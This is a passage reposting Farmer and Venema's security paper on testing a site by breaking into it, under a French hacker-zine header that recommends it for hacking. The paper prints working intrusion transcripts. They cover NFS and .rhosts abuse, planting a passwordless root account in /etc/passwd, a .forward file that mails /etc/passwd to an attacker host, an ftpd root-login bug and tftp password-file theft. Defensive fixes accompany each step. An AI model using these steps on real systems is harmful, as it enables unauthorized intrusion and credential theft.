"The private handbook" -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.11 Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type de hacking que l'on peut faire. C'est vraiment un document EXCELLENT !! _ _ _ _Improving the Security of Your Site by Breaking Into it_ Dan Farmer Wietse Venema Sun Microsystems Eindhoven University of Technology zen@sun.com wietse@wzv.win.tue.nl Introduction ------------ Every day, all over the world, computer networks and hosts are being broken into. The level of sophistication of these attacks varies widely; while it is generally believed that most break-ins succeed due to weak passwords, there are still a large number of intrusions that use more advanced techniques to break in. Less is known about the latter types of break-ins, because by their very nature they are much harder to detect. ----- CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. You name it, we've seen it broken into. Anything that is on the Internet (and many that isn't) seems to be fairly easy game. Are these targets unusual? What happened? Fade to... A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescense of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim... This seems to be the popular image of a system cracker. Young, inexperienced, and possessing vast quantities of time to waste, to get into just one more system. However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here. ----- Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's uebermensch, or, literally translated into English, "over man." Nietzsche used the term not to refer to a comic book superman, but instead a man who had gone beyond the incompetence, pettiness, and weakness of the everyday man. The uebercracker is therefore the system cracker who has gone beyond simple cookbook methods of breaking into systems. An uebercracker is not usually motivated to perform random acts of violence. Targets are not arbitrary -- there is a purpose, whether it be personal monetary gain, a hit and run raid for information, or a challenge to strike a major or prestigious site or net.personality. An uebercracker is hard to detect, harder to stop, and hardest to keep out of your site for good. Overview -------- In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show _why_ it is one. We will illustrate that even seemingly harmless network services can become valuable tools in the search for weak points of a system, even when these services are operating exactly as they are intended to. In an effort to shed some light on how more advanced intrusions occur, this paper outlines various mechanisms that crackers have actually used to obtain access to systems and, in addition, some techniques we either suspect intruders of using, or that we have used ourselves in tests or in friendly/authorized environments. Our motivation for writing this paper is that system administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. While it is widely known that the proper level of protection depends on what has to be protected, many sites appear to lack the resources to assess what level of host and network security is adequate. By showing what intruders can do to gain access to a remote site, we are trying to help system administrators to make _informed_ decisions on how to secure their site -- or not. We will limit the discussion to techniques that can give a remote intruder access to a (possibly non-interactive) shell process on a UNIX host. Once this is achieved, the details of obtaining root privilege are beyond the scope of this work -- we consider them too site-dependent and, in many cases, too trivial to merit much discussion. We want to stress that we will not merely run down a list of bugs or security holes -- there will always be new ones for a potential attacker to exploit. The purpose of this paper is to try to get the reader to look at her or his system in a new way -- one that will hopefully afford him or her the opportunity to _understand_ how their system can be compromised, and how. We would also like to reiterate to the reader that the purpose of this paper is to show you how to test the security of your own site, not how to break into other people's systems. The intrusion techniques we illustrate here will often leave traces in your system auditing logs -- it might be constructive to examine them after trying some of these attacks out, to see what a real attack might look like. Certainly other sites and system administrators will take a very dim view of your activities if you decide to use their hosts for security testing without advance authorization; indeed, it is quite possible that legal action may be pursued against you if they perceive it as an attack. There are four main parts to the paper. The first part is the introduction and overview. The second part attempts to give the reader a feel for what it is like to be an intruder and how to go from knowing nothing about a system to compromising its security. This section goes over actual techniques to gain information and entrance and covers basic strategies such as exploiting trust and abusing improperly configured basic network services (ftp, mail, tftp, etc.) It also discusses slightly more advanced topics, such as NIS and NFS, as well as various common bugs and configuration problems that are somewhat more OS or system specific. Defensive strategies against each of the various attacks are also covered here. The third section deals with trust: how the security of one system depends on the integrity of other systems. Trust is the most complex subject in this paper, and for the sake of brevity we will limit the discussion to clients in disguise. The fourth section covers the basic steps that a system administrator may take to protect her or his system. Most of the methods presented here are merely common sense, but they are often ignored in practice -- one of our goals is to show just how dangerous it can be to ignore basic security practices. Case studies, pointers to security-related information, and software are described in the appendices at the end of the paper. While exploring the methods and strategies discussed in this paper we we wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in shell, perl, expect and C, it examines a remote host or set of hosts and gathers as much information as possible by remotely probing NIS, finger, NFS, ftp and tftp, rexd, and other services. This information includes the presence of various network information services as well as potential security flaws -- usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It then can either report on this data or use an expert system to further investigate any potential security problems. While SATAN doesn't use all of the methods that we discuss in the paper, it has succeeded with ominous regularity in finding serious holes in the security of Internet sites. It will be posted and made available via anonymous ftp when completed; Appendix A covers its salient features. Note that it isn't possible to cover all possible methods of breaking into systems in a single paper. Indeed, we won't cover two of the most effective methods of breaking into hosts: social engineering and password cracking. The latter method is so effective, however, that several of the strategies presented here are geared towards acquiring password files. In addition, while windowing systems (X, OpenWindows, etc.) can provide a fertile ground for exploitation, we simply don't know many methods that are used to break into remote systems. Many system crackers use non-bitmapped terminals which can prevent them from using some of the more interesting methods to exploit windowing systems effectively (although being able to monitor the victim's keyboard is often sufficient to capture passwords). Finally, while worms, viruses, trojan horses, and other malware are very interesting, they are not common (on UNIX systems) and probably will use similar techniques to the ones we describe in this paper as individual parts to their attack strategy. Gaining Information ------------------- Let us assume that you are the head system administrator of Victim Incorporated's network of UNIX workstations. In an effort to secure your machines, you ask a friendly system administrator from a nearby site (evil.com) to give you an account on one of her machines so that you can look at your own system's security from the outside. What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don't stop there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find. There are so many methods and techniques that space precludes us from showing all of them, but we will try to show a cross-section of the most common and/or dangerous strategies that we have seen or have thought of. Ideally, you would gather such information about all hosts on the subnet or area of attack -- information is power -- but for now we'll examine only our intended target. To start out, you look at what the ubiquitous finger command shows you (assume it is 6pm, Nov 6, 1993): victim % finger @victim.com [victim.com] Login Name TTY Idle When Where zen Dr. Fubar co 1d Wed 08:00 death.com Good! A single idle user -- it is likely that no one will notice if you actually manage to break in. Now you try more tactics. As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from. To add to this information, you can use rusers (in particular with the -l flag) to get useful information on logged-in users. Trying these commands on victim.com reveals the following information, presented in a compressed tabular form to save space: Login Home-dir Shell Last login, from where ----- -------- ----- ---------------------- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com bin /bin Never logged in nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com guest /export/foo /bin/sh Never logged in ftp /home/ftp Never logged in Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data. For instance, running showmount on your target reveals: evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put an .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password. evil # mount victim.com:/export/foo /foo evil # cd /foo evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest evil # su guest evil % echo victim.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com! victim % If, instead of home directories, victim.com were exporting filesystems with user commands (say, /usr or /usr/local/bin), you could replace a command with a trojan horse that executes any command of your choice. The next user to execute that command would execute your program. We suggest that filesystems be exported: o Read/write only to specific, trusted clients. o Read-only, where possible (data or programs can often be exported in this manner.) If the target has a "+" wildcard in its /etc/hosts.equiv (the default in various vendor's machines) or has the netgroups bug (CERT advisory 91:12), any non-root user with a login name in the target's password file can rlogin to the target without a password. And since the user "bin" often owns key files and directories, your next attack is to try to log in to the target host and modify the password file to let you have root access: evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ls -ldg /etc drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % rlogin victim.com -l toor Welcome to victim.com! victim # A few notes about the method used above; "rsh victim.com csh -i" is used to initially get onto the system because it doesn't leave any traces in the wtmp or utmp system auditing files, making the rsh invisible for finger and who. The remote shell isn't attached to a pseudo-terminal, however, so that screen-oriented programs such as pagers and editors will fail -- but it is very handy for brief exploration. The COPS security auditing tool (see appendix D) will report key files or directories that are writable to accounts other than the superuser. If you run SunOS 4.x you can apply patch 100103 to fix most file permission problems. On many systems, rsh probes as shown above, even when successful, would remain completely unnoticed; the tcp wrapper (appendix D), which logs incoming connections, can help to expose such activities. ---- What now? Have you uncovered all the holes on your target system? Not by a long shot. Going back to the finger results on your target, you notice that it has an "ftp" account, which usually means that anonymous ftp is enabled. Anonymous ftp can be an easy way to get access, as it is often misconfigured. For example, the target may have a complete copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory instead of a stripped down version. In this example, though, you see that the latter doesn't seem to be true (how can you tell without actually examining the file?) However, the home directory of ftp on victim.com is writable. This allows you to remotely execute a command -- in this case, mailing the password file back to yourself -- by the simple method of creating a .forward file that executes a command when mail is sent to the ftp account. This is the same mechanism of piping mail to a program that the "vacation" program uses to automatically reply to mail messages. evil % cat forward_sucker_file "|/bin/mail zen@evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit evil % echo test | mail ftp@victim.com Now you simply wait for the password file to be sent back to you. The security auditing tool COPS will check your anonymous ftp setup; see the man page for ftpd, the documentation/code for COPS, or CERT advisory 93:10 for information on how to set up anonymous ftp correctly. Vulnerabilities in ftp are often a matter of incorrect ownership or permissions of key files or directories. At the very least, make sure that ~ftp and all "system" directories and files below ~ftp are owned by root and are not writable by any user. While looking at ftp, you can check for an older bug that was once widely exploited: % ftp -n ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> ls -al / (or whatever) If this works, you now are logged in as root, and able to modify the password file, or whatever you desire. If your system exhibits this bug, you should definitely get an update to your ftpd daemon, either from your vendor or (via anon ftp) from ftp.uu.net. The wuarchive ftpd, a popular replacement ftp daemon put out by the Washington University in Saint Louis, had almost the same problem. If your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a more recent version. Finally, there is a program vaguely similar to ftp -- tftp, or the trivial file transfer program. This daemon doesn't require any password for authentication; if a host provides tftp without restricting the access (usually via some secure flag set in the inetd.conf file), an attacker can read and write files anywhere on the system. In the example, you get the remote password file and place it in your local /tmp directory: evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit For security's sake, tftp should not be run; if tftp is necessary, use the secure option/flag to restrict access to a directory that has no valuable information, or run it under the control of a chroot wrapper program. ---- If none of the previous methods have worked, it is time to go on to more drastic measures. You have a friend in rpcinfo, another very handy program, sometimes even more useful than finger. Many hosts run RPC services that can be exploited; rpcinfo can talk to the portmapper a